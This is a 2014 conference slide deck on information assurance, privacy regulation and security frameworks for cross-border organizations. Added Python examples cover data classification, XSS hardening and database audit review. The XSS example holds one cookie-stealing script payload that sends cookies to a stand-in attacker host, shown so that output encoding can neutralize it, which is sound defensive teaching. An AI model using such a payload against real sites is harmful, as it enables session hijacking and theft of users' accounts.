Information Assurance in a Global Context: 
Strategies for Security and Privacy for Cross-Border and 
Multi-national Organizations 
Matt Stamper, MPIA, MS, CISA, ITIL 
VP of Services: redIT 
President: ISACA San Diego Chapter 
Co-Chair: InfraGard San Diego 
Board of Advisors: Multiple 
WCIT 
Guadalajara, Jalisco 
September 28th, 2014
Agenda 
 Why information assurance (IA) matters 
 Core Definitions: ILM, Security, Privacy, and IA 
 Regulatory Requirements 
 Frameworks & Approaches 
 New Technologies: IoT & Cloud 
 Lessons from Tijuana/San Diego 
 Questions & Comments
Why Information Assurance Matters… 
 We rarely question the quality of information we use to make 
decisions…putting our organizations, economies, and personal lives at 
risk 
 Information is the most valuable asset in our economy and fuels 
innovation & growth (data is the raw material of the global economy) 
o Commerce 
o Science 
o Government 
 Our dependencies on accurate and timely information are increasing 
exponentially 
 Massive asymmetries in IA practices 
 Gap between laws & regulations and practice 
 Critically, trust is at risk!
Trust and Societies: Quantifiable Impact 
“If you take a broad enough definition of trust, then it would explain basically all the difference between the per capita income of the United States and Somalia,” ventures Steve Knack, a senior economist at the World Bank who has been studying the economics of trust for over a decade. That suggests that trust is worth $12.4 trillion dollars a year to the U.S., which, in case you are wondering, is 99.5% of this country’s income (2006 figures). If you make $40,000 a year, then $200 is down to hard work and $39,800 is down to trust” (http://www.forbes.com/2006/09/22/trust-economy-markets-tech_cx_th_06trust_0925harford.html) 
“Trust is essential to maintaining the social and economic benefits that networked technologies bring to the United States and the rest of the world” (Consumer Data Privacy in a Networked World: A Framework for Protecting Privacy and Promoting Innovation in the Global Digital Economy, February 2012: White House) 
“Trust is at the heart of today’s complex global economy. But, paradoxically, trust is also in increasingly short supply in many of our societies, especially in our attitudes towards big business, parliaments and governments. This decline threatens our capacity to tackle some of today’s key challenges” (http://www.oecd.org/forum/the-cost-of-mistrust.htm)
The Impact of Lost Trust on Society 
Financial Crisis 
http://www.youtube.com/watch?v=uw_Tgu0txS0
International Data Flows: The Global Currency 
“The Growth of the Internet and the ability to move data rapidly and globally has been a key building block of the global economic order” (The Internet, Cross-Border Data Flows and International Trade, Joshua Meltzer, The Brookings Institution, February 2013) 
“Exports (emphasis mine) of cloud computing services were estimated to be worth approximately $1.5b in 2010 (and this is likely a conservative figure), and the market for cloud computing services is anticipated to grow by up to 600 percent by 2015” (Policy Challenges of Cross-Border Computing, Journal of International Commerce and Economics, November 2012). 
 Over 2 Billion Individuals have access to the Internet 
 More devices will be connected than people – billions of devices 
 Nearly free transaction costs 
 The days of information arbitrage are over 
 Barriers to innovation & exploitation are equally low 
Critical Shared Data Sets 
 Weather & Climate data 
 Census data 
 Healthcare and Disease Control data 
 Financial & Currency data 
 Trade data 
A McKinsey Global Institute study estimated that the Internet contributed over 10 percent to GDP growth in the last 
five years to the world’s top ten economies and for every job lost as a result of the Internet, 2.6 jobs have been 
created.
Open Government Initiatives: Public Sector Data 
Governments across the globe recognize that information is both: 
 A national resource that requires protection 
 A public good that should be readily disseminated 
Key areas of focus within the Open Government community include: 
 Transparency with budgets & procurement 
 Private/Public Sector data sharing 
 Innovation 
“The original and essentially libertarian nature of the Internet is increasingly being challenged by assertions by government of jurisdiction over the Internet or the development of rules that restrict the ability of individuals and companies to access the Internet and move data across borders” (The Internet, Cross-Border Data Flows and International Trade, Joshua Meltzer, The Brookings Institution, February 2013)
Why Information Assurance is Critical Now! 
Here’s just a quick sampling of what’s occurring on a daily basis, and this is just what has been publicly reported in the US. 
Organized Criminals in Russia Steal 1b Passwords (8/5/2014) 
http://www.nytimes.com/2014/08/06/technology/russian-gang-said-to-amass-more-than-a-billion-stolen-internet-credentials.html?_r=0 
JP Morgan Potentially Compromised (8/18/2014) 
http://online.wsj.com/articles/fbi-probes-possible-computer-hacking-incident-at-j-p-morgan-1409168480 
Hospital Hacked – 4.5 Million Records Compromised (8/18/2014) 
http://money.cnn.com/2014/08/18/technology/security/hospital-chs-hack/ 
Home Depot 
http://www.forbes.com/sites/quickerbettertech/2014/09/22/why-the-home-depot-breach-is-worse-than-you-think/ 
Target 
http://online.wsj.com/news/articles/SB10001424052702304773104579266743230242538 
The Car (2014 and moving forward) 
http://money.cnn.com/2014/06/01/technology/security/car-hack/
The Assault on Healthcare & ePHI 
 According to a Ponemon Institute study, criminal attacks on healthcare systems have risen 100% since 2010, with the average cost of a breach at $2m (US) 
 Over 90% of healthcare organizations have had a breach in the last two years, with 38% having had more than five incidents (down from 45% the previous year) 
 Risks with mandated health information exchanges (third-party considerations): the weakest link, despite security standards from HIPAA-HITECH 
 Bring Your Own Device (BYOD): nearly 50% of breaches are attributed to a lost or stolen device, and over 88% of organizations allow BYOD 
 Fortunately, the number of records compromised has decreased thanks to earlier detection and incident response – we’re getting better at handling security breaches…practice makes perfect?
Working Definitions
Security - Defined 
The easiest way to think about security is to think about the outcome of what good 
security provides: confidentiality, integrity, and availability of information (CIA). 
Confidentiality is the end-state of ensuring that information is only viewed and 
acted upon by those individuals, organizations, or systems that are authorized to 
see such information. “A loss of confidentiality is the unauthorized disclosure of 
information” – FIPS 199. 
Integrity is the end-state of information and its processing such that the 
information is believed to be complete, accurate, valid and subject to restricted 
access (CAVR): essentially, not tampered with or otherwise modified by 
unauthorized activity. “A loss of integrity is the unauthorized modification or 
destruction of information” – FIPS 199. 
Availability is simply that…that the information is available for its required use 
without delay or loss. “A loss of availability is the disruption of access to or use of 
information or an information system” – FIPS 199. 
Collectively, IT security is the set of processes that are involved with ensuring that 
data and information meet the confidentiality, integrity, and availability objectives of 
business.
Privacy - Defined 
Definitions of privacy are growing more nuanced over time. 
Privacy is “the right to be left alone” (Samuel Warren & Louis Brandeis: The Right to 
Privacy, Harvard Law Review, 1890). 
Privacy is “the right of the individual to be protected against the intrusion into his 
(her) personal life or affairs, or those of his (her) family, by direct physical means or by 
publication of information” (UK, Calcutt Committee: 1990) 
Privacy has contextual considerations: 
 Information Privacy 
 Bodily Privacy 
 Territorial / Physical Privacy 
 Communications Privacy 
(Foundations of Information Privacy and Data Protection, Swire, et. al., IAPP, 2012)
Information Assurance: Three Perspectives 
National Defense: Information Assurance as a concept is strongly 
influenced by the defense and national security communities and the 
concept of network centric warfare techniques: 
“Measures that protect and defend information systems by ensuring their 
availability, integrity, authentication, confidentiality, and non-repudiation. 
This includes providing for restoration of information systems by 
incorporating protection, detection, and reaction capabilities” (Department 
of Defense Directive Number 8500.1: October 24, 2002) 
Corporate View: Intellectual property, financial data, and client and partner data 
are subject to appropriate governance and control (CAVR). 
Consumer View: Personal health, financial and other PII data are controlled by the 
individual, and disclosure is also controlled by the individual.
Data Classification 
Given the regulatory and jurisdictional issues related to information and data flows, 
organizations need to implement best practices to classify their data. There are a 
number of approaches, including: 
National Security 
• Top Secret 
• Classified 
• Unclassified: FOUO 
Corporate Security 
• Confidential 
• Proprietary 
• Privileged / Restricted Access 
Personal Data 
• ePHI 
• Financial Information 
• Phone, Internet & Utility
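Classification only becomes actionable once records are actually tagged. The following Python is an added example, not code from the original deck: it scans a handful of constructed records, labels each as PII, Financial (a Luhn-valid primary account number, which pulls the store into PCI DSS scope), ePHI (health fields that co-occur with an identifier) or Public, and tallies the result into a first-cut data inventory. The field names, regular expressions, thresholds and sample values are assumptions for illustration.

```python
"""Added example, not part of the original deck: a small data-classification
pass that labels records and produces an inventory by classification.
Field names, regexes and sample records are constructed assumptions."""
import re
from collections import Counter

# Constructed sample records with fake values (the card numbers are test numbers).
SAMPLE_RECORDS = [
    {"name": "A. Lopez", "ssn": "123-45-6789", "note": "routine visit"},
    {"name": "B. Chen", "card": "4111 1111 1111 1111", "email": "b@example.com"},
    {"name": "C. Diaz", "card": "4111 1111 1111 1112", "phone": "619-555-0100"},
    {"name": "D. Kim", "diagnosis": "ICD-10 E11.9", "mrn": "MRN-00042"},
    {"sku": "AB-100", "qty": "3"},
]

SSN_RE = re.compile(r"^\d{3}-\d{2}-\d{4}$")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]{2,}$")
PHONE_RE = re.compile(r"^\d{3}-\d{3}-\d{4}$")
CARD_RE = re.compile(r"^(?:\d[ -]?){13,19}$")   # candidate PAN, confirmed by Luhn below

# Assumed field-name hints: health data is ePHI only when it is individually identifiable.
HEALTH_FIELDS = {"diagnosis", "mrn", "medication"}
IDENTIFIER_FIELDS = {"name", "ssn", "email", "phone"}


def luhn_ok(number):
    """Luhn check-digit test; rejects most random 13-19 digit strings."""
    digits = [int(c) for c in number if c.isdigit()]
    if not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify_record(record):
    """Return the set of classification labels for one record."""
    labels = set()
    has_identifier = False
    for key, value in record.items():
        if SSN_RE.match(value) or EMAIL_RE.match(value) or PHONE_RE.match(value):
            labels.add("PII")
            has_identifier = True
        elif key in IDENTIFIER_FIELDS:
            has_identifier = True
        if CARD_RE.match(value) and luhn_ok(value):
            labels.add("Financial")   # a real PAN puts this store in PCI DSS scope
    if has_identifier and HEALTH_FIELDS & set(record):
        labels.add("ePHI")            # health data plus an identifier is ePHI
    return labels or {"Public"}


def inventory(records):
    """Count records per label: the first deliverable of a data inventory."""
    counts = Counter()
    for record in records:
        counts.update(classify_record(record))
    return dict(counts)


if __name__ == "__main__":
    for record in SAMPLE_RECORDS:
        print(sorted(classify_record(record)), record)
    print(inventory(SAMPLE_RECORDS))
```

Two details carry the weight here: the Luhn check keeps a sixteen-digit order number from being misfiled as cardholder data, and the ePHI rule fires only when a health field sits next to an identifier, which is the HIPAA boundary rather than a keyword match.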
Information Lifecycle & IA 
[Figures: information lifecycle diagrams from TechTarget (http://searchdatamanagement.techtarget.com/feature/Information-assurance-Dependability-and-security-of-networked-information-systems) and the Cloud Security Alliance]
Bringing It All Together: IA, Security, and Privacy 
If we agree that information is the new global currency and that innovation and growth 
are predicated on the quality of the information and data we use, it’s important that 
we couple IA, Security and Privacy and make information governance a top priority for 
our organizations. 
Let’s get to work!
Privacy Laws & Standards 
By Country / Region 
• Mexico 
• Canada 
• US 
• EU 
• APEC 
By Industry 
 HIPAA-HITECH 
 Financial Services
Laws & Regulations: Mexico, Canada and US 
Mexico – National Privacy Law (LFPDPPP) 
http://www.diputados.gob.mx/LeyesBiblio/pdf/LFPDPPP.pdf 
Canada – National Privacy Law (PIPEDA) 
https://www.priv.gc.ca/index_e.asp 
https://www.priv.gc.ca/leg_c/leg_c_p_e.asp 
US – Sectoral Approach (Federal Trade Commission) 
http://www.whitehouse.gov/sites/default/files/privacy-final.pdf 
States 
Massachusetts - http://www.mass.gov/ocabr/docs/idtheft/201cmr1700reg.pdf 
California - http://oag.ca.gov/ecrime/databreach/reporting 
Nevada - http://www.leg.state.nv.us/NRS/NRS-603A.html
Laws & Regulations: Australia, APEC & Europe (EU) 
Australia 
http://www.oaic.gov.au/privacy/privacy-act/the-privacy-act 
http://www.oaic.gov.au/privacy/privacy-resources/privacy-fact-sheets/other/privacy-fact-sheet-17-australian-privacy-principles 
APEC 
http://www.apec.org/About-Us/About-APEC/Fact-Sheets/APEC-Privacy-Framework.aspx 
European Union 
http://europa.eu/about-eu/countries/member-countries/index_en.htm 
http://ec.europa.eu/dataprotectionofficer/legal_framework_en.htm 
https://safeharbor.export.gov/list.aspx (Safe Harbor Registrants)
Privacy & Security – Inextricably Linked 
Security can exist without privacy but privacy 
cannot exist without security. Consequently, 
privacy frameworks offer insights into good 
governance and security practices though many 
standards and frameworks have been challenged 
by recent events – notably the Payment Card 
Industry – Data Security Standard (PCI-DSS).
International Privacy Regimes: APEC & OECD 
APEC Privacy Framework (2004): 
1. Preventing Harm 
2. Notice 
3. Collection Limitation 
4. Uses of Personal Information 
5. Choice 
6. Integrity of Personal Information 
7. Security Safeguards 
8. Access and Correction 
9. Accountability 
OECD Privacy Guidelines (1980): 
1. Collection Limitation Principle 
2. Data Quality Principle 
3. Purpose Specification Principle 
4. Use Limitation Principle 
5. Security Safeguards Principle 
6. Openness Principle 
7. Individual Participation Principle 
8. Accountability Principle
International Privacy (Cont.): FIPs & Madrid 
Fair Information Practices (FIPs, US HEW 1973; not to be confused with the NIST FIPS publications cited above): 
1. No secret repositories 
2. Individual control over use 
3. Individual consent 
4. Correction 
5. Precautions against misuse 
Madrid Resolution (2009): 
1. Principle of Lawfulness and Fairness 
2. Purpose Specification Principle 
3. Proportionality Principle 
4. Data Quality Principle 
5. Openness Principle 
6. Accountability Principle
HIPAA-HITECH: Administrative, Physical & Technical Safeguards 
Security Management Process (164.308(a)(1)): risk analysis, risk management, system review 
Assigned Security Responsibility (164.308(a)(2)): accountability 
Workforce Security (164.308(a)(3)): authorization and/or supervision, clearance and termination procedures 
Information Access Management (164.308(a)(4)): RBAC procedures 
Security Awareness and Training (164.308(a)(5)): anti-malware, log-in procedures, password management 
Security Incident Procedures (164.308(a)(6)): incident response procedures
HIPAA-HITECH: Administrative, Physical & Technical Safeguards (cont.) 
Contingency Plan (164.308(a)(7)): backup and recovery, BC/DR procedures and testing, applications and data criticality analysis 
Evaluation (164.308(a)(8)): review of systems 
Business Associate Contracts and Other Arrangements (164.308(b)(1)): contractual obligations with service providers (business associates), cascading liability 
Facility Access Controls (164.310(a)(1)): access controls, maintenance records, contingency operations 
Access Control (164.312(a)(1)): encryption and decryption, automatic log-off, emergency access* 
Audit Controls (164.312(b)): evidence of review 
Transmission Security (164.312(e)(1)): integrity controls (addressable), security and integrity of ePHI in transit
Gramm-Leach-Bliley (GLB) – FTC Enforcement 
Financial Services Firms have an obligation to safeguard non-public information (NPI) 
such as full account numbers, social security numbers (SSNs), etc. 
Obligations: 
 Privacy Notices 
 Non-Affiliated Third Parties & Opt Out 
 Ensure the Security & Confidentiality of Customer Records 
 Protect Against Anticipated Threats or Hazards 
 Protect Against Unauthorized Access 
The FTC has established a clear expectation of security as a corporate 
obligation.
Security Frameworks 
Security Frameworks & Standards 
• SANS 20 
• PCI-DSS 
• ISO 27001/27002 
• Cloud Security Alliance 
• COBIT (ISACA)
SANS Top 20 Security Controls 
The SANS Top 20 is considered a good set of minimum necessary security controls. 
The controls cover a broad suite of good control activity: 
 Critical Control 1: Inventory of Authorized and Unauthorized Devices 
 Critical Control 2: Inventory of Authorized and Unauthorized Software 
 Critical Control 3: Secure Configurations for Hardware and Software on 
Mobile Devices, Laptops, Workstations, and Servers 
 Critical Control 4: Continuous Vulnerability Assessment and Remediation 
 Critical Control 5: Malware Defenses 
 Critical Control 6: Application Software Security 
 Critical Control 7: Wireless Device Control 
 Critical Control 8: Data Recovery Capability 
 Critical Control 9: Security Skills Assessment and Appropriate Training to 
Fill Gaps 
 Critical Control 10: Secure Configurations for Network Devices such as 
Firewalls, Routers, and Switches
SANS Top 20 Security Controls (cont.) 
 Critical Control 11: Limitation and Control of Network Ports, Protocols, and 
Services 
 Critical Control 12: Controlled Use of Administrative Privileges 
 Critical Control 13: Boundary Defense 
 Critical Control 14: Maintenance, Monitoring, and Analysis of Audit Logs 
 Critical Control 15: Controlled Access Based on the Need to Know 
 Critical Control 16: Account Monitoring and Control 
 Critical Control 17: Data Loss Prevention 
 Critical Control 18: Incident Response and Management 
 Critical Control 19: Secure Network Engineering 
 Critical Control 20: Penetration Tests and Red Team Exercises
PCI-DSS: 3.0 – 12 Requirements 
Requirement 1: Install and maintain a firewall configuration to protect cardholder 
data 
Requirement 2: Do not use vendor-supplied defaults for system passwords and 
other security parameters 
Requirement 3: Protect stored cardholder data 
Requirement 4: Encrypt transmission of cardholder data across open, public 
networks 
Requirement 5: Protect all systems against malware and regularly update anti-virus 
software or programs 
Requirement 6: Develop and maintain secure systems and applications 
https://www.pcisecuritystandards.org/documents/PCI_DSS_v3.pdf
PCI-DSS: 3.0 – 12 Requirements (cont.) 
Requirement 7: Restrict access to cardholder data by business need to know 
Requirement 8: Identify and authenticate access to system components 
Requirement 9: Restrict physical access to cardholder data 
Requirement 10: Track and monitor all access to network resources and 
cardholder data 
Requirement 11: Regularly test security systems and processes. 
Requirement 12: Maintain a policy that addresses information security for all 
personnel. 
Requirement A.1: Shared hosting providers must protect the cardholder data 
environment 
https://www.pcisecuritystandards.org/documents/PCI_DSS_v3.pdf
ISO 27001, CSA & ISACA 
There are three organizations in particular that are driving good security standards and 
practices and that should inform an organization’s control design: 
International Organization for Standardization (ISO) 
http://www.iso.org/iso/home/standards/management-standards/iso27001.htm 
Cloud Security Alliance (CSA) 
https://cloudsecurityalliance.org/ 
Information Systems Audit and Control Association (ISACA) 
https://www.isaca.org/Pages/default.aspx
COBIT – Cloud Governance 
ISACA’s “IT Control Objectives for Cloud Computing: Controls and 
Assurance in the Cloud” provides a solid framework for assessing 
controls in cloud environments and a reference for good governance. 
“ISACA defines governance as the set of responsibilities and 
practices exercised by the board and executive management with 
the goal of providing strategic direction, ensuring that objectives 
are achieved and ascertaining that risks are managed 
appropriately.” 
Leveraging cloud services requires controls and governance that 
touch upon the four COBIT 4.1 domains: 
• Plan and Organize (PO) 
• Acquire and Implement (AI) 
• Deliver & Support (DS) 
• Monitor & Evaluate (ME)
Technology and IA 
Internet of Things (IoT) 
Cloud Computing
Internet of Things 
http://www.theregister.co.uk/2014/05/07/freescale_internet_of_things/
[Figure: service demarcation. The same stack (Applications, Database, O/S, Hypervisors, Servers, Storage, Networks, Backups) is shown for each of four models, On Site, Infrastructure as a Service, Platform as a Service and Software as a Service; moving from on-site to SaaS, responsibility for successively higher layers shifts from the customer to the provider.] 
Service Demarcation & Information Assurance 
Security, Monitoring & Governance: Critical Foundation 
Roles & Responsibilities are Crucial Regardless of the Service Model
Application Layer 
[Figure: the data-center stack (Application, Database, OS, Hypervisors, Servers, Storage, Network, Backups) with two Application boxes (Client and SaaS), and Security, Monitoring and ITIL/Service Management shown spanning every layer.] 
• Audit trail 
• Segregation of duties 
• What is logged? 
• Who is responsible for the application depends on the service model 
• How is the application impacted by other layers? 
• What information is shared among layers? 
• Shared administrative accounts?
Cloud Layers – Application Risk 
Applications probably offer the widest array of risks to 
organizations. One of the key reasons: think about who uses 
applications…it’s us. 
Applications – Typical Risks: 
 Human error / social networking exposure / APT attacks 
 Segregation of duties / elevated privileges 
 Database linkages / poor data validation 
 Session hijacking, man-in-the-middle attacks, cross-site scripting 
 Poor application coding 
 Poor passwords (complexity/aging) 
 Poor logging habits 
 Many firewalls are not application aware (they see only ports 80 and 443, not what flows over them) 
 Other considerations?
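Three of the risks above (poor data validation, cross-site scripting, session hijacking) come from the same place: the application treats user-supplied bytes as trusted. The following Python is an added example, not code from the deck: an unsafe HTML render beside its hardened form (allow-list validation plus output encoding for the HTML context), and a session cookie carrying the attributes that blunt cookie theft by script or by a network man-in-the-middle. The function names, the username allow-list and the sample payload are assumptions.

```python
"""Added example, not from the original deck: an unsafe HTML render beside
its hardened form, plus a session cookie with hijack-resistant attributes.
Function names, the allow-list and the payload are assumptions."""
import html
import re
from http.cookies import SimpleCookie

# Assumed allow-list for usernames: reject anything that is not plainly a username.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def render_comment_vulnerable(author, text):
    """Builds HTML by concatenation with no validation or encoding: markup in
    either value reaches the browser as markup (cross-site scripting)."""
    return "<p><b>%s</b>: %s</p>" % (author, text)


def render_comment_hardened(author, text):
    """Validate structured input against an allow-list, and encode free text
    for the HTML context it is written into."""
    if not USERNAME_RE.match(author):
        raise ValueError("author fails allow-list validation")
    return "<p><b>%s</b>: %s</p>" % (
        html.escape(author, quote=True),
        html.escape(text, quote=True),
    )


def session_cookie(session_id, secure=True):
    """Set-Cookie value for a session identifier with hijack-resistant attributes."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    morsel = cookie["session"]
    morsel["httponly"] = True       # script cannot read it, so XSS cannot simply exfiltrate it
    morsel["secure"] = secure       # never sent over plaintext HTTP, so a network MitM cannot capture it
    morsel["samesite"] = "Strict"   # not attached to cross-site requests (attribute needs Python 3.8+)
    morsel["path"] = "/"
    return morsel.OutputString()


if __name__ == "__main__":
    # Constructed payload: a cookie-stealing script of the kind a comment field receives.
    payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
    print(render_comment_vulnerable("guest", payload))
    print(render_comment_hardened("guest", payload))
    print(session_cookie("0123456789abcdef"))
```

The hardened render still accepts the payload as comment text; it just encodes it so the browser displays it instead of executing it. Rejecting it outright would be a validation decision for free-text fields that rarely holds up, whereas the username is structured data and can be refused.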
Database Layer 
[Figure: the same data-center stack, with the Database layer highlighted and Security, Monitoring and ITIL/Service Management spanning every layer.] 
• Database activity monitoring 
• Time-stamping transactions and logs 
• Memory-based databases: data living in memory 
• Hadoop and other evolving non-database approaches to analytics
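Database activity monitoring only counts as the HIPAA "evidence of review" (Audit Controls, 164.312(b)) if someone actually reviews the log. The following Python is an added example, not code from the deck: it parses constructed database audit lines and applies three reviewer rules, a shared administrative account used from two sources within minutes, a bulk read of a sensitive table by an interactive user, and sensitive-table access outside business hours. The log format, account names, tables and thresholds are assumptions.

```python
"""Added example, not from the original deck: a review pass over database
audit log lines that produces the findings an assessor asks to see.
The log format, account names and thresholds are constructed."""
import re
from datetime import datetime, timedelta

# Assumed key=value audit line format, timestamps in UTC.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) db=(?P<db>\S+) user=(?P<user>\S+) src=(?P<src>\S+) "
    r"op=(?P<op>\S+) table=(?P<table>\S+) rows=(?P<rows>\d+)$"
)

# Constructed sample lines: one normal day plus three things a reviewer should see.
SAMPLE_LOG = """\
2014-09-28T09:02:11Z db=ehr user=jsmith src=10.0.5.21 op=SELECT table=patients rows=1
2014-09-28T09:05:40Z db=ehr user=dbadmin src=10.0.5.21 op=UPDATE table=patients rows=1
2014-09-28T09:06:02Z db=ehr user=dbadmin src=10.0.7.88 op=SELECT table=patients rows=12
2014-09-28T13:30:15Z db=ehr user=reporting src=10.0.9.3 op=SELECT table=encounters rows=50000
2014-09-28T23:41:09Z db=ehr user=jsmith src=10.0.5.21 op=SELECT table=patients rows=3800
"""

SHARED_ACCOUNTS = {"dbadmin"}        # accounts known to be shared among administrators
SERVICE_ACCOUNTS = {"reporting"}     # batch accounts expected to read in bulk
SENSITIVE_TABLES = {"patients", "encounters"}
BULK_ROWS = 1000                     # interactive reads above this are unusual
BUSINESS_HOURS = range(7, 19)        # 07:00-18:59 UTC
WINDOW = timedelta(minutes=5)        # two sources for one shared account inside this window


def parse_events(text):
    """Parse audit lines; an unparseable line is itself worth failing loudly on."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            raise ValueError("unparseable audit line: %r" % line)
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        e["rows"] = int(e["rows"])
        events.append(e)
    return events


def review(events):
    """Return (rule, user, timestamp) findings, in time order."""
    findings = []
    last_seen = {}   # shared account -> (timestamp, source) of its previous event
    for e in sorted(events, key=lambda ev: ev["ts"]):
        user, ts, src = e["user"], e["ts"], e["src"]
        if user in SHARED_ACCOUNTS:
            prev = last_seen.get(user)
            if prev and prev[1] != src and ts - prev[0] <= WINDOW:
                findings.append(("shared-account-multi-source", user, ts))
            last_seen[user] = (ts, src)
        if user in SERVICE_ACCOUNTS or e["table"] not in SENSITIVE_TABLES:
            continue
        if e["op"] == "SELECT" and e["rows"] >= BULK_ROWS:
            findings.append(("bulk-read", user, ts))
        if ts.hour not in BUSINESS_HOURS:
            findings.append(("after-hours-access", user, ts))
    return findings


if __name__ == "__main__":
    for rule, user, ts in review(parse_events(SAMPLE_LOG)):
        print(ts.isoformat(), user, rule)
```

The shared-account rule is the one that matters most for the "shared administrative accounts?" question on the previous slide: a shared login cannot be attributed to a person, so the only available evidence is where and when it was used. The reporting account is excluded from the bulk rule by design, which is exactly the kind of exception that should be documented alongside the rule.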
Service Provider Considerations 
Contracts Matter – Wrap Around Agreements Present Risks to Organizations 
 Right to audit clause 
 Data location covenants 
 Compliance Reviews: 
 SSAE 16 SOC 1 
 ISAE 3402 
 SOC 2 
 Roles & Responsibilities 
 Statements of Work
Common Themes 
• Inventory of Information 
• Inventory of Critical Assets 
• Supply-Chain / Vendor assessments 
• Risk Assessments 
• Security Assessments 
• Board of Directors 
• Executive Responsibility 
• Investment in Training & Competencies
Tijuana – San Diego (Our IA Ecosystem) 
Brier & Thorn – SOC in Tijuana 
http://brierandthorn.com/ 
BridgeSTOR – Cloud Data Encryption 
http://bridgestor.com/ 
CyberFlow Analytics – APT Solution 
http://www.cyberflowanalytics.com/ 
CyberTECH & CyberHive 
http://cybertechnetwork.org/ 
http://cyberhivesandiego.org/cybertech/ 
InfraGard 
http://www.infragardsd.org/ 
ISACA – SD 
http://isaca-sd.org/
Quick Wins 
Information Assurance begins with: 
• Know Legal Obligations 
• Data Classification 
• Data Inventory 
• Data Retention 
• Privacy Impact Assessment 
• Security / Vulnerability Assessment 
• Keep The Board Informed – No Surprises 
• Assume a Breach!
References 
Privacy 
https://www.privacyrights.org/data-breach/new 
http://www.hhs.gov/ocr/privacy/hipaa/administrative/breachnotificationrule/breachtool.html 
https://www.enisa.europa.eu/activities/identity-and-trust/risks-and-data-breaches/dbn 
Security 
https://www.isaca.org 
http://www.sans.org/ 
http://www.nist.gov/cybersecurity-portal.cfm 
https://cloudsecurityalliance.org/
us.redit.com 
Matt Stamper, MPIA, MS, CISA, ITIL (CIPP-US: Pending) 
T 858.836.02224 
M 760.809.2164 
E matt.stamper@redIT.com

Open Government Data & Privacy ProtectionSylvia Ogweng
 
Review DNI WTAs for 2015 and 2016 (see attached). Compare and con.docx
Review DNI WTAs for 2015 and 2016 (see attached). Compare and con.docxReview DNI WTAs for 2015 and 2016 (see attached). Compare and con.docx
Review DNI WTAs for 2015 and 2016 (see attached). Compare and con.docxronak56
 
1. security 20 20 - ebook-vol2
1. security 20 20 - ebook-vol21. security 20 20 - ebook-vol2
1. security 20 20 - ebook-vol2Adela Cocic
 
Identity Theft ResponseYou have successfully presented an expa
Identity Theft ResponseYou have successfully presented an expaIdentity Theft ResponseYou have successfully presented an expa
Identity Theft ResponseYou have successfully presented an expaLizbethQuinonez813
 
Malcolm Crompton, IIS Partners Irish Future Internet Forum - Socioeconomics
Malcolm Crompton, IIS Partners Irish Future Internet Forum - SocioeconomicsMalcolm Crompton, IIS Partners Irish Future Internet Forum - Socioeconomics
Malcolm Crompton, IIS Partners Irish Future Internet Forum - SocioeconomicsIrish Future Internet Forum
 
1Annotated BibliographyTamika S. BouldinLibe
1Annotated BibliographyTamika S. BouldinLibe1Annotated BibliographyTamika S. BouldinLibe
1Annotated BibliographyTamika S. BouldinLibecargillfilberto
 
CSMFO 2012 Data Privacy in Local Government
CSMFO 2012 Data Privacy in Local GovernmentCSMFO 2012 Data Privacy in Local Government
CSMFO 2012 Data Privacy in Local GovernmentDonald E. Hester
 

Similar to Information Assurance Strategies for Cross-Border Organizations (16)

data privacy.pdf data privacy data privacy
data privacy.pdf data privacy data privacydata privacy.pdf data privacy data privacy
data privacy.pdf data privacy data privacy
 
Anonos NTIA Comment Letter letter on ''Big Data'' Developments and How They I...
Anonos NTIA Comment Letter letter on ''Big Data'' Developments and How They I...Anonos NTIA Comment Letter letter on ''Big Data'' Developments and How They I...
Anonos NTIA Comment Letter letter on ''Big Data'' Developments and How They I...
 
Anonos FTC Comment Letter Big Data: A Tool for Inclusion or Exclusion
Anonos  FTC Comment Letter Big Data: A Tool for Inclusion or ExclusionAnonos  FTC Comment Letter Big Data: A Tool for Inclusion or Exclusion
Anonos FTC Comment Letter Big Data: A Tool for Inclusion or Exclusion
 
Where In The World Is Your Sensitive Data?
Where In The World Is Your Sensitive Data?Where In The World Is Your Sensitive Data?
Where In The World Is Your Sensitive Data?
 
Data Privacy Compliance (Series: Corporate & Regulatory Compliance Boot Camp)
Data Privacy Compliance (Series: Corporate & Regulatory Compliance Boot Camp)Data Privacy Compliance (Series: Corporate & Regulatory Compliance Boot Camp)
Data Privacy Compliance (Series: Corporate & Regulatory Compliance Boot Camp)
 
Proven Practices to Protect Critical Data - DarkReading VTS Deck
Proven Practices to Protect Critical Data - DarkReading VTS DeckProven Practices to Protect Critical Data - DarkReading VTS Deck
Proven Practices to Protect Critical Data - DarkReading VTS Deck
 
wp-analyzing-breaches-by-industry
wp-analyzing-breaches-by-industrywp-analyzing-breaches-by-industry
wp-analyzing-breaches-by-industry
 
Privacy in the Age of Big Data: Exploring the Role of Modern Identity Managem...
Privacy in the Age of Big Data: Exploring the Role of Modern Identity Managem...Privacy in the Age of Big Data: Exploring the Role of Modern Identity Managem...
Privacy in the Age of Big Data: Exploring the Role of Modern Identity Managem...
 
Open Government Data & Privacy Protection
Open Government Data & Privacy ProtectionOpen Government Data & Privacy Protection
Open Government Data & Privacy Protection
 
Review DNI WTAs for 2015 and 2016 (see attached). Compare and con.docx
Review DNI WTAs for 2015 and 2016 (see attached). Compare and con.docxReview DNI WTAs for 2015 and 2016 (see attached). Compare and con.docx
Review DNI WTAs for 2015 and 2016 (see attached). Compare and con.docx
 
Data Privacy Compliance
Data Privacy ComplianceData Privacy Compliance
Data Privacy Compliance
 
1. security 20 20 - ebook-vol2
1. security 20 20 - ebook-vol21. security 20 20 - ebook-vol2
1. security 20 20 - ebook-vol2
 
Identity Theft ResponseYou have successfully presented an expa
Identity Theft ResponseYou have successfully presented an expaIdentity Theft ResponseYou have successfully presented an expa
Identity Theft ResponseYou have successfully presented an expa
 
Malcolm Crompton, IIS Partners Irish Future Internet Forum - Socioeconomics
Malcolm Crompton, IIS Partners Irish Future Internet Forum - SocioeconomicsMalcolm Crompton, IIS Partners Irish Future Internet Forum - Socioeconomics
